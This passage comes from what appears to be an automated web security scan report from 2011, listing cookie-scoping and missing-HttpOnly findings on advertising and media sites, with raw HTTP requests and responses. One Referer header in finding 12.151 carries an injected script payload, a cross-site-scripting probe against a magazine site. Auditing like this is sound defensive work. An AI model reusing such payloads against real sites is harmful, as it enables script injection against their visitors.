Set-Cookie: BizoCustomSegments=""; Domain=.bizographics.com; Expires=Sat, 17-Sep-2011 17:16:31 GMT; Path=/
Set-Cookie: BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Thu, 15-Sep-2016 17:16:30 GMT; Path=/
Content-Length: 0
Connection: keep-alive

12.150. http://www.burstnet.com/cgi-bin/opt_out.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/opt_out.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/opt_out.cgi?nocache=0.7964712 HTTP/1.1
Host: www.burstnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: TID=174q04v1muc3qi; CMP=1AF.1Gg5^19q.1Gg5^186.1Eg1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Location: /cgi-bin/opt_out_verify.cgi
Content-Type: text/plain
Content-Length: 0
Date: Sat, 17 Sep 2011 17:16:43 GMT
Connection: close
Set-Cookie: CMS=1; domain=.burstnet.com; path=/; expires=Sun, 19-Jun-2011 17:16:42 GMT
Set-Cookie: CMP=1; domain=.burstnet.com; path=/; expires=Sun, 19-Jun-2011 17:16:42 GMT
Set-Cookie: TData=1; domain=.burstnet.com; path=/; expires=Sun, 19-Jun-2011 17:16:42 GMT
Set-Cookie: TID=1; domain=.burstnet.com; path=/; expires=Sun, 19-Jun-2011 17:16:42 GMT
Set-Cookie: BOO=opt-out; domain=.burstnet.com; path=/; expires=Thu, 15-Sep-2016 17:16:42 GMT
Set-Cookie: 56Q8=0; expires=Wed, 22-Aug-2001 17:30:00 GMT; path=/; domain=.www.burstnet.com

12.151. http://www.burstnet.com/enlightn/8117//3E06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/8117//3E06/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/8117//3E06/ HTTP/1.1
Host: www.burstnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: TID=174q04v1muc3qi; CMP=1AF.1Gbw^19q.1Gbq^186.1Eg1; 56Q8=3wa8tKA-mJ3zLI8brmO_1mZLAnzwl8-A9kddOUsNi9p23gomEmKZ1zA

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Sat, 17 Sep 2011 16:35:40 GMT
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1AF.1Gbw^19q.1Gg5^186.1Eg1; path=/; expires=Mon, 17-Sep-2012 16:35:39 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;
12.152. http://www.burstnet.com/enlightn/8171//99D2/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/8171//99D2/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/8171//99D2/ HTTP/1.1
Host: www.burstnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.local.com/
Cookie: TID=174q04v1muc3qi; CMP=1AF.1Gbw^19q.1Gg5^186.1Eg1; 56Q8=3wa8tKA-mJ3zLI8brmO_1mZLAnzwl8-A9kddOUsNi9p23gomEmKZ1zA; CMS=/

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Sat, 17 Sep 2011 16:37:09 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1AF.1Gg5^19q.1Gg5^186.1Eg1; path=/; expires=Mon, 17-Sep-2012 16:37:09 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;
12.153. http://www.foxreno.com/2011/0915/29196544_320X240.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxreno.com
Path:   /2011/0915/29196544_320X240.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/0915/29196544_320X240.jpg HTTP/1.1
Host: www.foxreno.com
Proxy-Connection: keep-alive
Referer: http://www.gather.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 15 Sep 2011 19:49:28 GMT
ETag: "470c77-22e8-2cad4200"
Accept-Ranges: bytes
Content-Length: 8936
Content-Type: image/jpeg
Cache-Control: max-age=3101
Expires: Sat, 17 Sep 2011 17:16:27 GMT
Date: Sat, 17 Sep 2011 16:24:46 GMT
Connection: close
Set-Cookie: alpha=8b4a4350087e0000cec9744e6cb20b0008860500; expires=Tue, 14-Sep-2021 16:24:46 GMT; path=/; domain=.foxreno.com

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222........@.."..............................
...[SNIP]...
12.154. http://www.local.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.local.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 17 Sep 2011 16:37:01 GMT
ntCoent-Length: 41856
Server: Microsoft-IIS/7.5
Set-Cookie: sid=88811a43-0af3-4ba9-88a3-70e025fb1d32; domain=local.com; path=/
Set-Cookie: localcom=cid=710&loc=Dallas%2c+TX&zip=75201&kw=&uid=23621f6d-15b3-4a75-bfd2-b297c2a7c0ab&expdate=634544410222441200; domain=local.com; expires=Mon, 17-Oct-2011 16:37:02 GMT; path=/
Set-Cookie: localcom_yb=cid=&sid=1e153b27-a9cd-45a3-8cf7-8c3ec8b313ac&exp=634518508222441200; domain=local.com; expires=Sat, 17-Sep-2011 17:07:02 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 41856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-us" >
<head><title>Local.com - Search for local businesses,
...[SNIP]...
12.155. http://www.mediaplex.com/optout_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaplex.com
Path:   /optout_pure.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /optout_pure.php?cookie_test=true HTTP/1.1
Host: www.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: svid=OPT-OUT; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Last-Modified: Sat, 17 Sep 2011 17:19:34 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 166
Content-Type: text/html; charset=utf-8
Expires: Sat, 17 Sep 2011 17:19:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 17:19:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mojo1=deleted; expires=Fri, 17-Sep-2010 17:19:34 GMT; path=/; domain=.mediaplex.com
Set-Cookie: mojo2=deleted; expires=Fri, 17-Sep-2010 17:19:34 GMT; path=/; domain=.mediaplex.com
Set-Cookie: mojo3=deleted; expires=Fri, 17-Sep-2010 17:19:34 GMT; path=/; domain=.mediaplex.com

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Set Cookie to optout</title>

<head/>

<body>


<body/>

<html/>
12.156. http://www.mediaplex.com/optout_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaplex.com
Path:   /optout_pure.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout_pure.php?nocache=0.3264927 HTTP/1.1
Host: www.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: svid=319726075672; mojo3=16161:27909/17263:22723/3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Last-Modified: Sat, 17 Sep 2011 17:19:15 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Location: /optout_pure.php?cookie_test=true
Content-Length: 166
Content-Type: text/html; charset=utf-8
Expires: Sat, 17 Sep 2011 17:19:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 17:19:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: svid=OPT-OUT; expires=Tue, 14-Sep-2021 17:19:15 GMT; path=/; domain=.mediaplex.com

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Set Cookie to optout</title>

<head/>

<body>


<body/>

<html/>
12.157. http://www.nexac.com/nai_optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nexac.com
Path:   /nai_optout.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nai_optout.php?nocache=2.007604E-03 HTTP/1.1
Host: www.nexac.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: na_tc=Y; OAX=Mhd7ak48ZSEAAtYi

Response

HTTP/1.1 302 Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml",CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo IVAa IVDa HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=ignore; expires=Thu, 24-Feb-2028 17:18:23 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Location: http://www.nexac.com/nai_verify.php
Content-type: text/html
Content-Length: 0
Date: Sat, 17 Sep 2011 17:18:23 GMT
Server: lighttpd/1.4.18

12.158. http://www.seventeen.com/cm/shared/images/logos/hearst-teen-logo-white.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seventeen.com
Path:   /cm/shared/images/logos/hearst-teen-logo-white.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cm/shared/images/logos/hearst-teen-logo-white.gif?01AD=0 HTTP/1.1
Host: www.seventeen.com
Proxy-Connection: keep-alive
Referer: http://www.seventeen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=bd71dea-132794851b8-57f14eef-1; original_referrer=http://hearst.com/newspapers/metrix4media.php

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 06 Nov 2007 16:58:07 GMT
ETag: "9bf787-51c-43e45897a47de"
Accept-Ranges: bytes
Content-Length: 1308
Content-Type: image/gif
Cache-Control: max-age=86400
Date: Sat, 17 Sep 2011 16:34:52 GMT
Connection: close
Set-Cookie: H1E2=0; expires=Sat, 15-Oct-2011 16:34:52 GMT; path=/; domain=seventeen.com
Set-Cookie: GID=322D1C219DF0E6D2F3B1A74078599756; expires=Sat, 15-Oct-2011 16:34:52 GMT; path=/; domain=seventeen.com
P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI"

GIF89a..(....................................................!.......,......(......I..8....`(.di.h..l..p,.tm.x..|....pH,b.....l...t.+,l.l..."...x{.z...Y.. ....r....Cc>k....~.......Wa....    ...m...~..
...[SNIP]...
12.159. http://www2.glam.com/app/site/affiliate/nc/g-optout.act  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.glam.com
Path:   /app/site/affiliate/nc/g-optout.act

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/site/affiliate/nc/g-optout.act?nocache=0.3544915 HTTP/1.1
Host: www2.glam.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ctags=%3bct%3dxboxk3905; glam_sid=115216131255688937411; etags=ct-Dotomi_4500; edata=ct-Dotomi_4500-220-14

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
p3p: policyref="http://glammedia.com/about_glam/legal/policy.xml",CP="NON DSP COR NID PSAa PSDa OUR IND UNI COM NAV INT STA"
Location: http://www2.glam.com/app/site/affiliate/nc/g-optout-v.act
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Sat, 17 Sep 2011 17:18:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 17:18:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ctags=%3Bct%3Dxboxk3905; expires=Sat, 17-Sep-2011 14:31:53 GMT; path=/; domain=.glam.com
Set-Cookie: glam_sid=115216131255688937411; expires=Sat, 17-Sep-2011 14:31:53 GMT; path=/; domain=.glam.com
Set-Cookie: etags=ct-Dotomi_4500; expires=Sat, 17-Sep-2011 14:31:53 GMT; path=/; domain=.glam.com
Set-Cookie: edata=ct-Dotomi_4500-220-14; expires=Sat, 17-Sep-2011 14:31:53 GMT; path=/; domain=.glam.com
Set-Cookie: optout=1; expires=Sat, 17-Sep-2011 14:31:53 GMT; path=/; domain=.glam.com
Set-Cookie: optout=1; expires=Thu, 15-Sep-2016 17:18:33 GMT; path=/; domain=.glam.com

13. Cookie without HttpOnly flag set  previous  next
There are 202 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

13.1. http://ads.adxpose.com/ads/ads.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=goT0SKb9csQQCWy8_378374 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4A64007B1257FF9806B09557713C76CD; Path=/
ETag: "20773-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:38:33 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
13.2. http://afe.specificclick.net/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?l=24536&sz=728x90&wr=j&t=j&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F728x90%2Fht_1064834_61686626%3Ft%3D1316295397553%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252Fflashtalking%252Fftlocal.html%253Fifsrc%253Dhttp%25253A%25252F%25252Fa.flashtalking.com%25252Fxre%25252F18%25252F189583%25252F237666%25252Fjs%25252Fj-189583-237666.js%2526click%253Dhttp%253A%252F%252Fmpc.mxptint.net%252F1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%25253f%2526ftx%253D%2526fty%253D%2526ftadz%253D%2526ftscw%253D%2526cachebuster%253D272524.66208301485%252526ftguid%25253D1343AC00FD7B0F%252526ftcfid%25253D237666001%252526ftoob%25253D%252526ftsg%25253Dadg%26refer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F610%252Fhearst%252F300x250%252Fht_1064834_61686626%253Ft%253D1316295375688%2526tz%253D300%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526url%253Dhttp%25253A%25252F%25252Fwww.seattlepi.com%25252F%2526refer%253Dhttp%25253A%25252F%25252Fwww.seattlepi.com%25252F&r=http%3A%2F%2Fwww.seattlepi.com%2Fflashtalking%2Fftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A%2F%2Fmpc.mxptint.net%2F1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26cachebuster%3D272524.66208301485%2526ftguid%253D1343AC00FD7B0F%2526ftcfid%253D237666001%2526ftoob%253D%2526ftsg%253Dadg&rnd=464496 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626?t=1316295397553&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2Fflashtalking%2Fftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A%2F%2Fmpc.mxptint.net%2F1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26cachebuster%3D272524.66208301485%2526ftguid%253D1343AC00FD7B0F%2526ftcfid%253D237666001%2526ftoob%253D%2526ftsg%253Dadg&refer=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F300x250%2Fht_1064834_61686626%3Ft%3D1316295375688%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26refer%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=838a74cddbeb6ddecfad61578129

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=83e0f8336bb36aba6f4b9bf3f72d; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 16:35:25 GMT
Content-Length: 808

document.write('<iframe src="http://afe.specificclick.net/serve/v=5;m=3;l=24536;c=176942;b=1044949;ts=20110917123525" width="728" height="90" border="0" frameborder="0" marginwidth="0" marginheight="0
...[SNIP]...
13.3. http://afe.specificclick.net/serve/v=5  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/v=5;m=3;l=24537;c=176942;b=1044948;ts=20110917124135 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27704D7D_10F5909%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=284706.307342276%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=8436053a140c7d8ad92ac8e95005

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=843b4712134f40e3eed737c2bff8; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Sat, 17 Sep 2011 16:41:35 GMT
Vary: Accept-Encoding
Content-Length: 1731
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
13.4. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.misquincemag.com%2F&uid=goT0SKb9csQQCWy8_378374&xy=0%2C0&wh=728%2C90&vchannel=90120&cid=196462&iad=1316294811596-40833402285352350&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=54308467B58171B4041647F4995A4024; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Sat, 17 Sep 2011 16:39:35 GMT
Connection: close

